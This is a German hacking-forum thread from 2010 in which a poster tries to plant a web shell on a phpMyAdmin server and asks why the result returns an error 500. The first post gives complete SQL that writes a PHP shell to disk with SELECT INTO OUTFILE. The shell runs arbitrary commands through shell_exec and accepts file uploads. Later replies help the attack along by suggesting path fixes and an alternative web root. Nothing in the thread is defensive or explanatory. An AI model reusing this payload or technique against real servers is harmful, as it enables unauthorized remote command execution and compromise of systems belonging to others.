#1 22. Oktober 2010 Hi versuche eine Shell zu Spawnen auf ein PMA server (UNKNOWN DOCROOT), habe hier einiges gefunden wie man das DocumentRoot-Verzeichnis findet Document-root ist: Code: C:\xampp\phpMyAdmin\libraries\ habe auch gefunden das man die \ mit // ersetzen soll dann habe ich meine shell gespawnt : Code: use mysql; DROP TABLE IF EXISTS `shell`; CREATE TABLE shell (codetab text); INSERT INTO shell (codetab) values ('<?$sendfile=$_REQUEST["sendfile"];$cmd=$_REQUEST["-cmd"];if($sendfile=="true") { $fn=$_FILES["file"]["name"]; $tn=$_FILES["file"]["tmp_name"]; if(move_uploaded_file($tn, dirname(__FILE__)."/".$fn)) $result="<br><font color=green>upload done</p>"; else $result="<br><font color=red>upload failed</p>"; } ?><html><body><form method=POST><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"></form><form enctype="multipart/form-data" method="post" action=""><input type=file name=file size=20><input type="submit" value="Upload"><input type="hidden" name="sendfile" value="true"><?=$result?></form><pre><? if ($cmd!="") echo shell_exec($cmd);?></pre></body></html>. '); SELECT * INTO OUTFILE 'C:\\xampp\\phpMyAdmin\\libraries\\shell.php' FROM shell; DROP TABLE shell; FLUSH LOGS; bekomme auch die Meldung: Code: Der Import wurde erfolgreich abgeschlossen, 6 Abfragen wurden ausgeführt. nur wenn ich jetzt die url eingebe : ip\phpMyAdmin\libraries\shell.php kommt immer Code: Serverfehler! Die Anfrage kann nicht beantwortet werden, da im Server ein interner Fehler aufgetreten ist. Der Server ist entweder überlastet oder ein Fehler in einem CGI-Skript ist aufgetreten. Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber. Error 500 was mache ich falsch ? LG + Multi-Zitat Zitieren
#2 22. Oktober 2010 AW: Backslash docroot (PMA) Versuch mal mit / anstatt von \\.. Hat bei mir immer gefunzt... Also: C:\xampp\phpMyAdmin\libraries\ => C:/xampp/phpMyAdmin/libraries/ MfG + Multi-Zitat Zitieren
#3 22. Oktober 2010 AW: Backslash docroot (PMA) Die Shell ist offensichtlich angekommen (sonst wäre es 404). Google verrät dir mehr zur Fehlermeldung: HTTP-Fehler 500 Internal server error (Interner Serverfehler) erklärt Du wirst mir aber sicher gleich sagen, dass du das schon gefunden hast und nach einer vorgekauten Lösung suchst, da du die Informationen nicht deuten kannst. Ansonsten kannst du es mal in C:/xampp/htdocs versuchen und die Shell dann über http://ip/shell.php aufrufen. + Multi-Zitat Zitieren
#4 22. Oktober 2010 AW: Backslash docroot (PMA) Wie Alex² schon sagte, wird der HTTP-Fehlercode 500 zurückgegeben, wenn ein Fehler im Script auftrat bzw. der PHP-Interpreter irgendein Problem hat. + Multi-Zitat Zitieren